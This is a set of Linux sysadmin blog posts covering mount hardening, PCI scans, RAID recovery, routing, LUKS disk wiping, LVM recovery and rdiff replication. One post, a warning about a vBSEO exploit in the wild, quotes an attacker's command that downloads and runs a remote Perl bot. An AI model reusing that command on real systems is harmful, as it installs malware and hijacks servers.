Tightening CentOS/RHEL Security

While there is far more to hardening a server than this single example, this is an often overlooked security issue in many default installations of RHEL and RHEL-based distributions (CentOS, Scientific Linux, etc.)

CentOS and RHEL come with the isdn4k-utils and coolkey packages installed by default for graphical workstations.  Unfortunately, these packages create world-writable directories which binaries and scripts may execute from.  While it is common to tighten /tmp, /var/tmp and /usr/tmp against execution attacks, these directories often go un-noticed.

If you do not use these utilities (and few servers do), they can be easily removed:

yum remove isdn4k-utils coolkey

Of course if you are using these, then you should find a way to secure these mountpoints with the noexec mount option.  This can be done with a loopback filesystem mounted atop the offending mountpoints or with separate LVM volumes for each.

Traditionally, /var does not run executable code so you could mount the entire /var mountpoint as noexec.  Its a great security practice if you can support this, however, there are some packages which expect to run their update scripts out of /var/tmp/ so be prepared to fix some broken package updates or installations.  When you do have a package error, simply mount /var as executable:

mount -o remount,rw,exec /var

install the package, and then disable execution on the mountpoint:

mount -o remount,rw,noexec /var

I recommend nosuid and nodev mount options for these types of mount points as well to restrict less common attack vectors.

-Eric

Linux PCI Compliance: Passing the Scan

PCI Compliance Introduction

PCI compliance is required by the credit card card processing industry.  If you are a merchant provider, no doubt you have been contacted by a PCI compliance scanning vendor of some form, generally sponsored by your bank or merchant provider.

Passing a PCI compliance scan is not too difficult, though there are a few technical hurdles to pass.

 

Server and Network Scanning

Generally speaking, you are required to answer an (excessively) long series of security questions, many of which may have no relation to your business.  Further, they obtain your server IP addresses and scan your systems for security vulnerabilities.

The report format varies, but generally you receive a brief technical description for each item, usually linked to the CVE “Common Vulnerabilities and Exposures” database.  If you are technically inclined or have technical staff who understand what should be changed to pass the scan, then you can generally resolve this internally.

If not, then unfortunately the scanning vendors do not offer support when a compliance scan fails and you are left to your own devices.

 

Passing the PCI Compliance Scan for Linux

Keep in mind that the purpose of passing a scan isn’t just to pass: passing the scan means your server meets a minimum baseline security level for operation on the public Internet.  Not only will your merchant provider be tickled by your compliance, but your server will be more secure for the effort.

There are a series of general security practices that you can follow which will help you pass your scan and increase server security at the same time:

  • Run only the services which are absolutely necessary for your server’s operation
  • Install distribution package and security updates
  • Configure a firewall to minimize the scan surface available to the scanner or to an attacker
  • Use SSL certificates signed by a reputable certificate authority
  • Make sure intermediate SSL certificates are installed
  • Configure your SSL framework to force strong cryptographic ciphers
  • Be certain that the domain being scanned matches the common name on the certificates.  For example: if your SSL certificate is www.example.net but your website is www.example.com, then you will probably fail the PCI scan.
  • Use your web server’s document root for a single purpose.  For example, develop your new shiny website on a different or internal domain, not in the “/dev” or “/new” directory on your production site.
  • Make sure your web application is up to date—especially if your site is based on an old version of an open-source content management system such as WordPress or Joomla.
  • Dedicate one server per application function.  For example, have mail on a dedicated mail server, web on a dedicated web server.  Running both services on the same machine increases your security exposure and makes it more difficult to pass your PCI scan.

If you have followed these practices and are still having trouble passing your scan—or just want to increase your server’s security—then give me a call.  I’m always happy to help!

-Eric

 

 

vBulletin and vBSEO Exploit: Attacks in the Wild

We are seeing the use of this exploit in the wild:

BSEO <= 3.6.0 “proc_deutf()” Remote PHP Code Injection

Its been patched for over a year, but someone has automated scanning for vbseocp.php and hosts are getting compromised.

The fix is to update vBSEO to the latest version, and the source of the attack lives here: ./vbseo/includes/functions_vbseocp_abstract.php with improper escaping of the char_repl POST parameter.  This is vulnerable whether or not you have register_globals enabled.

The attack we are seeing takes the form of:

cd /tmp;wget ftp://user:pass@host/x.pl;curl -O ftp://user:pass@host/x.pl;perl x.pl;rm -rf x.pl

We have seen two distinct payloads: an IRC c&c bot and a spam engine executing from /tmp/.  The IRC bot sets its name as /usr/local/sbin/httpd to appear benign and makes outbound IRC connections.

If you think you may be infected, contact us as soon as possible so we can get this removed and locked down.  Our standard countermeasures would have prevented this attack even on unpatched hosts.

-Eric

Linux Software RAID, disk-0 failed. Will my server still boot?

First, it is my opinion that you shouldst use hardware RAID of some form.  Software RAID, in my opinion, is best used to stripe volumes between multiple hardware RAID controllers which do not support spanning.

My opinion aside, will the server still boot?  Yes!  … if it is configured correctly.

The Multiple Disk (md) infrastructure in Linux is quite flexible, and there are many articles available for its use.  When configuring a server to recover from a failed disk-0 in a RAID mirror, your boot partition should be mirrored using metadata version 1.0.  Version 1.0 places metadata at the end of the device, whereas 1.1 metadata is at the front of the device.  Since metadata is at the end of the disk, GRUB (or whatever bootloader you prefer) can still read your boot images.

Lets say you have a server with (at least) three disk bays.  Disk-0 in bay1 fails,  so you add a 3rd disk in bay3 and rebuild the volume.  The process might look something like thos:

## Transfer the boot sector
# dd if=/dev/sdb count=1 of=/dev/sdc 

## Reread the partition table
# blockdev --rereadpt /dev/sdc

## Add the hot spare
# mdadm --add /dev/md0 /dev/sdc1
# mdadm --add /dev/md1 /dev/sdc2

## Fail the bad disk:
# mdadm --fail /dev/sda1
# mdadm --fail /dev/sda2

Now disk-0 (sda) is failed, and the mirror is rebuilding on sdb/sdc.  If you boot, what will happen?  Will it load the mirror correctly?  Will the kernel respect which disk is in the mirror?  We recently had a real-life scenario where a CentOS 6 server was in production and could not be rebooted, but we needed to know if the server would come up if there was a reboot.  Disk-0 was dying (but not completely dead yet).

Test to make certain

  1. If disk1 may not contain the right boot sector, so when disk0 is removed, will the server boot?
  2. If disk0 isn’t removed and the server is rebooted, will it boot?  If it does come up, will the kernel respect that disk0 is, indeed, failed?

The answer to both of these questions, at least in theory, is yes.

To be sure, I simulated the two failure scenarios above and everything worked without intervention.  This was the order of things, disks are named disk0, disk1, disk2:

  1. Install CentOS 6 on mirrored boot and lvm partitions across two disks.
  2. Add disk2, copy the bootsector over, and add as a hot spare.
  3. Fail disk0, let the hot spare rebuild.
  4. reboot!
  5. The system loads the bootsector from disk0 because it is the first physical disk serviced by BIOS.
  6. The kernel boots and auto-detects the RAID1 mirrors on disk1 and disk2, ignoring disk0 which we failed (good!)  This verifies question #1.
  7. Physically remove disk0; BIOS will see disk1 as the first BIOS drive.
  8. reboot.
  9. The system loads the bootsector from disk1 because it is the first physical disk serviced by BIOS.
  10. The kernel boots and initrd auto-configures the RAID1 mirrors on disk1 and disk2.  Thus validates question #2.

Of course you would expect the above to work—but its always best to test and understand exactly how your disk-volume software will act in various failure scenarios when working in a production environment.  “I think so” isn’t good enough to go on—you must know.

So, if you’re booting from software RAID, you can usually trust that your data is safe.   Sometimes a failed disk will hang IOs to the device.  I have seen servers completely freeze when this happens while it attempts to retry the IO over-and-over-and-over.  This is where hardware RAID can really save you; the hardware controller would have timed-out the RAID member disk, failed it, and continued with very little (if any) interruption.

Linux Raid controller tips

  • Be careful of “softraid” chipsets out there, not all RAID is real-RAID.  My favorite controllers in order or preference are 3ware, Areca, and LSI.  The PERC 7xx series are ok too, but I wouldn’t trust a PERC 2xx.
  • If you use LSI go with a higher-end controller for better performance and less fuss.  Generally speaking, I’ve had great success with LSI controllers that have onboard cache memory (even if you don’t use it in write-back mode).  Cacheless LSI controllers have created problems more times than I care to recall.
  • Check the RAID-levels that the card supports.  If the controller supports RAID-5 or -6, it is probably a better controller even if you only use the RAID-10 functionality.
  • Also of note, LSI now owns 3ware and uses LSI chips in 3ware’s hardware.  I have since used LSI-built 3ware cards and they still have the simple and robust 3ware feel.  I have a feeling that LSI will keep the 3ware brand for some time to come.

-Eric

 

Bypassing the link-local routing table

Linux can use multiple routing tables, which is convenient for providing different routes for specific networks based on many different metrics, such as the source address.  For example, if we want to route traffic from 192.168.99.0/24 out the 172.17.22.1 default gateway, you could create a new table and route it as such:

# ip route add default via 172.17.22.1 dev eth7 table 100
# ip rule add from 192.168.99.0/24 lookup 100

Now imagine another scenario, where you wish to route traffic from 192.168.99.0/24 to an external network (the Internet), but 1.2.3.0/24 is (for some reason) link-local on your host.  That is, an address like 1.2.3.4 is directly assigned to an adapter on your host.  Linux tracks link-local connections through its ‘local’ routing table, and the ip rule’s show the preference order as:

# ip rule show
0:    from all lookup local 
32766:    from all lookup main 
32767:    from all lookup default

You might think deleting and adding the ‘local’ rule above with a higher preference and placing your new rule above it would fix the problem, but I’ve tried it—and it doesn’t.  Searching around shows that others have had the same problem.

So what to do?  Use fwmark.

First, change local’s preference from 0 to 100:

ip rule del from all pref 0 lookup local
ip rule add from all pref 100 lookup local

Next, mark all traffic from 192.168.99.0/24 with some mark, we are using “1”.  Note that I am using OUTPUT because 192.168.99.0/24 is my local address.  You might want PREROUTING if this is a forwarding host.

iptables -t mangle -s 192.68.99.0/24 -A OUTPUT -j MARK --set-mark 1

And finally add the rule that routes it through table 100:

# ip rule add fwmark 1 pref 10 lookup 100
# ip rule show
10:    from all fwmark 0x1 lookup 100
100:    from all lookup local
32766:    from all lookup main
32767:    from all lookup default

# ip route flush cache

Now all locally generated traffic to 1.2.3.0/24 from 192.168.99.0/24 will head out 172.17.22.1 on eth7 through table 100, instead of being looked up in the ‘local’ table.

Yay!

-Eric

 

 

Quickly fill a disk with random bits (without /dev/urandom)

When an encrypted medium is prepared for use, it is best practice to fill the disk end-to-end with random bits.  If the disk is not prepared with random bits, then an attacker could see which blocks have and have not been written, simply by running a block-by-block statistical analysis:  if the average 1/0 ratio is near 50%, its probably encrypted.  It may be simpler than this for new disks, since they tend to default with all-zero’s.

This is a well-known problem, and many will encourage you to use /dev/urandom to fill the disk.  Unfortuntaly, /dev/urandom is much slower than even rotational disks, let-alone GB/sec RAID on SSD’s:

root@geekdesk:~# dd if=/dev/urandom of=/dev/null bs=1M count=100
100+0 records in
100+0 records out
104857600 bytes (105 MB) copied, 7.24238 s, 14.5 MB/s
root@geekdesk:~#

So how can we fill a block device with random bits, quickly?  The answer might be surprising:  we use /dev/zero—but write to the encrypted device.  Once the encrypted device is full, we erase the LUKS header with /dev/urandom.  The second step is of course slower, but we need only overwrite the first 1MB so it takes a fraction of a second.

Note that the password we are using (below) needn’t be remembered—in fact, you shouldn’t be able to remember it.  Use something long and random for a password, and keep it just long enough to erase the volume.  I use base64 from /dev/urandom for password generation:

# 256 random bits
dd if=/dev/urandom bs=1 count=32 | base64

Now format the volume and map it with luksOpen.  Note that we are not using a filesystem—this is all at block-layer:

root@geekdesk:~# cryptsetup luksFormat /dev/loop3
This will overwrite data on /dev/loop3 irrevocably.
Are you sure? (Type uppercase yes): YES
Enter LUKS passphrase: <random one-time-use password>
Verify passphrase:
root@geekdesk:~# cryptsetup luksOpen /dev/loop3 testdev
Enter passphrase for /dev/loop3: <same password as above>

root@geekdesk:~# dd if=/dev/zero of=/dev/mapper/testdev bs=1M
dd: writing `/dev/mapper/testdev': No space left on device
99+0 records in
98+0 records out
103804928 bytes (104 MB) copied, 1.21521 s, 85.4 MB/s

See, more than 6x faster (the disk is most likely the 85MB/s bottleneck)!  This will save hours (or days) when preparing multi-terabyte volumes.  Now remove the device mapping, and urandom the first 1MB of the underlying device:

# This line is the same as "cryptsetup luksClose testdev"
root@geekdesk:~# dmsetup remove /dev/mapper/testdev
root@geekdesk:~# dd if=/dev/urandom of=/dev/loop3 bs=512 count=2056
2056+0 records in
2056+0 records out
1052672 bytes (1.1 MB) copied, 0.0952705 s, 11.0 MB/s

Note that we overwrote the first 2056 blocks from /dev/urandom.  2056 is the default LUKS payload offset, but you can verify that you’ve overwritten the correct number of blocks using luksDump:

root@geekdesk:~# cryptsetup luksDump /dev/loop3
LUKS header information for /dev/loop3

Version:           1
Cipher name:       aes
Cipher mode:       cbc-essiv:sha256
Hash spec:         sha1
Payload offset:    2056   [...snip...]

Now your volume is prepared with random bits, and you may format it with any cryptographic block-device mechanism you prefer, safe knowing that an attacker cannot tell which blocks are empty, and which are in use (assuming the attacker has a single point-in-time copy of the block device).

I like LUKS since it is based on PKCS#11 and includes features such multiple passphrase slots and passphrase changes (it never reveals the actual device key, your passphrase unlocks the real key), but other volume encryption devices exist—or you might export the volume via iSCSI/ATAoE/FCoE and use a proprietary block-layer encryption mechanism.

If someone can explain an attack against this mechanism, I would be glad to hear about it.  In this example we used AES in CBC mode so we are spreading the IV bits across the entire volume.  Conceivably one could write an AES-CTR mode tool with a random key to do the same thing and this may be a stronger mechanism.  (To my knowledge, the dm-crypt toolchain does not have a CTR mode, nor would you want one for general use).

The method above fails when an attacker can tell the difference between the original AES-CBC wipe with random bits (where all plaintext bits are set to zero)—and the new encryption mechanism with a different key that will be used in production atop of the prepared disk volume.  While there may be an attack for AES-CBC with all-zero’s (though I don’t think there is), AES-CTR mode by its definition would make this method more effective since each block is independent of the next.  One might be able to argue that AES-CBC creates an AES-CTR mode implementation where the counter is a permutation of AES itself.  If this can be proven, then both methods are equally secure.

Either way, this is likely better (and definitely faster) than /dev/urandom for filling a disk, since /dev/urandom is a pseudo-random number generator.  Using /dev/urandom for terabytes of data may begin to develop a pattern once its effective entropy pool is spread too thin.  Even with seed-help from /dev/random, /dev/urandom might run out of steam.

In the end, random bits XORed with random bits still look like random bits when placed next to other random bits—but you’re welcome to debate this.  Yay for crypto!

ok, now back to work 🙂

-Eric

Edit: Mon Sep 17 19:43:22 PDT 2012
Come to think of it, you don’t even need a password at the luksFormat stage.  LUKS generates its own strong random bits for the actual block-cipher key.  The passphrase just unlocks that key.  For the purposes of wiping the disk with random bits, you can use “<enter><enter>” as your passphrase… just make sure you wipe the LUKS header in step 2 from /dev/urandom.

Recovering an overflowed LVM volume configured with –virtualsize

/dev/vg/somevolume: read failed after 0 of 4096 at nnnnn: Input/output error

If you’ve ever seen the above error, this usually means you have run out of disk space on the CoW-volume of a snapshot volume.

…but there is another uses for snapshots, and that is thin provisioning for sparse data use.  If you create an LVM volume using the –virtualsize option, you can provide a logical size that is much larger than the actual underlying volume.  If you exceed the space for such a volume, you will get the same error above—and all data on the volume will be invalidated and inaccessible.

LVM silently uses the ‘zero’ devicemapper target as the underlying volume.  Thus, even though the data is invalidated nothing is lost.  By overlaying the lost data over the top of a zero device, we can resurrect the data.

We have prepared our example file with the following:

lvcreate -L 100m --virtualsize 200m -n virtual_test vg
mkfs.ext4 /dev/vg/virtual_test
 [...]
mount /dev/vg/virtual_test /mnt/tmp/

And now we fill the disk:

dd if=/dev/zero of=/mnt/tmp/overflow-file
dd: writing to `/mnt/tmp/overflow-file': Input/output error

Message from syslogd@backup at Aug 27 15:17:27 ...
 kernel:journal commit I/O error
272729+0 records in
272728+0 records out
139636736 bytes (140 MB) copied
[I had to reboot here.  The kernel still thought
 the filesystem was mounted and I could not continue.
 Obviously we are working near the kernel's limits on
 this CentOS 6.2 2.6.32-based kernel]

Now we have a 200MB volume with 100MB allocated to it, which is now full.  LVM has marked the volume as invalid and the data is no longer available.

First, resize the volume so we have room after resizing.  Otherwise, the first byte written to the volume would, again, invalidate the disk:

lvresize -L +100m /dev/vg/virtual_test
 [errors, possibly, just ignore them]
  Extending logical volume virtual_test to 200.00 MiB
  Logical volume virtual_test successfully resized

Now we edit the -cow file directly with a short perl script.  The 5th byte is the ‘valid’ flag (see http://www.redhat.com/archives/linux-lvm/2006-September/msg00132.html) so all we need to is set it to ‘1’:

 perl -e 'open(F, ">>", "/dev/mapper/vg-virtual_test-cow"); seek(F, 4, SEEK_SET); syswrite(F,"\x01",1); close(F);'

Now have lvm re-read the CoW metadata and you’re in business:

lvchange -an /dev/backup/virtual_test
  [ignore errors]
lvchange -ay /dev/backup/virtual_test
  [shouldn't have any errors]
lvs
  LV                    VG       Attr     LSize   Pool Origin               Data% 
  virtual_test          vg   swi-a-s- 200.00m      [virtual_test_vorigin]   33.63

At this point you should probably fsck your filesystem, it may be damaged—or at least nead a journal-replay since it stopped abruptly at the end of its allocated space.  And as you can see, the “overflow” file is there up until the point of filling the disk.

[root@backup mapper]# e2fsck /dev/vg/virtual_test
e2fsck 1.41.12 (17-May-2010)
/dev/vg/virtual_test: recovering journal
/dev/vg/virtual_test: clean, 12/51200 files, 66398/204800 blocks
[root@backup mapper]# mount /dev/vg/virtual_test /mnt/tmp/
[root@backup mapper]# ls -lh /mnt/tmp/
total 54M
drwx------. 2 root root 12K Aug 27 15:16 lost+found
-rw-r--r--. 1 root root 54M Aug 27 15:17 overflow-file

-Eric

Linux and Open Source: Internet Security and Vulnerability Disclosure

Internet attacks and vulnerabilities are increasingly held secret and sold to the highest bidder.  Unfortunately, this encourages developers to hide back doors and seel them on the open (black/grey) market.   This compromises the security of the Internet at large, and our personal security as well.

Open-source software provides the ability for many eyes to publicly vet the security of software, particularly when software patch commits are audited by more than one person.  While open-source software may not solve the problem, the open philosophy provides a community for public code review.  Certainly a closed-source backdoor would be more difficult to detect than an open-source backdoor—though I am sure others may debate my argument.

I encourage you to read Bruce Schneier’s most recent Crypto Gram for further discussion on this topic:

The Vulnerabilities Market and the Future of Security

-Eric

Naming “$@” or “$*” as values in Bash

Ever wanted $1 .. $9 to be more meaningful in a clean one-liner?

echo "$*" | ( 
	read cmd  tun_dev tun_mtu link_mtu ifconfig_local_ip ifconfig_remote_ip rest
	echo "the rest of your $cmd program and its arguments $link_mtu"
	echo "go here..."

)

It would be great if one could just

				echo "$@" | read a b c

but since the pipe forks the built-in shell command ‘read’, the variables $a, $b, $c are set in the sub-shell, not the shell you would want. The parenthesis force a subshell for your operation, and while its not pretty, it works quite well!

Also, thanks to Uwe Waldmann for his great Bash/sh/ksh quoting guide.

Cheers,

-Eric

Block Device Replication with rdiff

I’ve written a few articles on rdiff-backup, and if you need an increment history to go back in time, rdiff-backup is your tool. 

But what if you just want to replicate a large block device over the Internet? Well, then we turn to the utility that inspired rdiff-backup: rdiff

For our example, we wil assume you are using LVM to create device snapshots—but really, this could be any snapshot or SAN flash implementation. I’ve just written it for Linux’s LVM.

  • /dev/remote-vg0/source will be the device we are replicating from
  • /dev/local-vg0/dest will be the device we are replicating to
  • remotehost is the system that hosts /dev/remote-vg0/source
  • This script is being executed on the destination system.
# Define our source and destination
# (Note: spaces in these paths could break the script)
SOURCE=/dev/remote-vg0/source
DEST=/dev/local-vg0/dest
SSHUSER=root@remotehost

# Choose a size large enough for the remote write-activity during
# replication
SOURCE_SNAPSHOT_SIZE=4G

# Must be the same size as $DEST, because rdiff writes in sequential
# order (it thinks the destination is an empty file, so it re-writes
# everything.)
#
# See Feb 18, 2011 update notes below.  This can be much smaller now if you 
# use the patch below, since writes are avoided unless necessary.
#DEST_SNAPSHOT_SIZE=50G

# This is probably safe with the librsync patch discussed below
DEST_SNAPSHOT_SIZE=$SOURCE_SNAPSHOT_SIZE

# Enable compression
SSHOPTS='-C'

# 32k I/O buffers, and 16k blocksize.
RDIFF_OPT='-I 32768 -O 32768 -b 16384 -s'

SOURCE_NAME=`basename "$SOURCE"`
SOURCE_SNAP="`dirname $SOURCE`/$SOURCE_NAME-snap"
SOURCE_SNAP_NAME="$SOURCE_NAME-snap"

DEST_NAME=`basename "$DEST"`
DEST_SNAP="`dirname $DEST`/$DEST_NAME-snap"
DEST_SNAP_NAME="$DEST_NAME-snap"

# remove the previous snapshots, if any
ssh $SSHOPTS "$SSHUSER" "lvremove -f '$SOURCE_SNAP'"
lvremove -f "$DEST_SNAP"

# Snapshot the remote host:
ssh $SSHOPTS "$SSHUSER" "lvcreate -s -n '$SOURCE_SNAP_NAME' -L $SOURCE_SNAPSHOT_SIZE '$SOURCE'"

# Snapshot the local destination host:
lvcreate -s -n "$DEST_SNAP_NAME" -L $DEST_SNAPSHOT_SIZE "$DEST"

rdiff $RDIFF_OPT -- signature "$DEST_SNAP" - | \
  ssh $SSHOPTS "$SSHUSER" "rdiff $RDIFF_OPT -- delta - '$SOURCE_SNAP' -" | \
  rdiff $RDIFF_OPT -- patch "$DEST_SNAP" - "$DEST"

# Compare the volumes, if you like
ssh $SSHOPTS "$SSHUSER" "md5sum '$SOURCE_SNAP'"
md5sum $DEST

# cleanup, remove the snapshots.
ssh $SSHOPTS $SSHUSER "lvremove -f '$SOURCE_SNAP'"
lvremove -f "$DEST_SNAP"

This is a convenient single-pipe process for replication, and it uses the librsync rolling-checksum process, using minimal bandwidth on the network that ssh traverses.

Executing this script yields something like this on a 50GB volume; note that the md5sum’s match perfectly.

  Logical volume "source-snap" created
  Logical volume "dest-snap" created
rdiff: signature statistics: signature[3276800 blocks, 16384 bytes per block]
rdiff: loadsig statistics: signature[3276800 blocks, 16384 bytes per block]
rdiff: delta statistics: literal[27842 cmds, 805715968 bytes, 83492 cmdbytes] copy[1462034 cmds, 52881375232 bytes, 372798 false, 10746386 cmdbytes]
rdiff: patch statistics: literal[27842 cmds, 805715968 bytes, 83492 cmdbytes] copy[1462034 cmds, 52881375232 bytes, 0 false, 10746386 cmdbytes]
7fddc578cdbf5f4e30b7f815e72acebd  /dev/local-vg0/dest
7fddc578cdbf5f4e30b7f815e72acebd  /dev/remote-vg0/source-snap
  Logical volume "source-snap" successfully removed
  Logical volume "dest-snap" successfully removed

Since rdiff does not know the destination is a snapshot of the basis-file, it rewrites the whole thing. Indeed, it could simply seek instead of copy from the basis-file, but the stock rdiff tool does not support this. If I write a patch, it will get posted here—and if you write a patch, please let me know! (see update below!)

Until then, keep double the space free in your volume group that you need to run a snapshot and it should work great!

Update: Fri Feb 18 12:39:51 PST 2011 I just wrote patch for rdiff (within the librsync package) that updates in place, by patching the file-stream-sink code in buf.c. Basically, it reads before writing. If the data read in is the same that it would have written, it skips the write and advances the write pointer; otherwise, it writes as normal. Since this avoids writing to the device that had a snapshot except where necessary, much less snapshot-backing-store is required. This code passes all of the ‘make check’ tests that come with librsync, and I believe it to be stable. On my system, rdiff syncs are about 2x faster due to the much reduced write-overhead of the original implementation.

  • The patch is here
  • and the patched code, ready to compile, is here

-Eric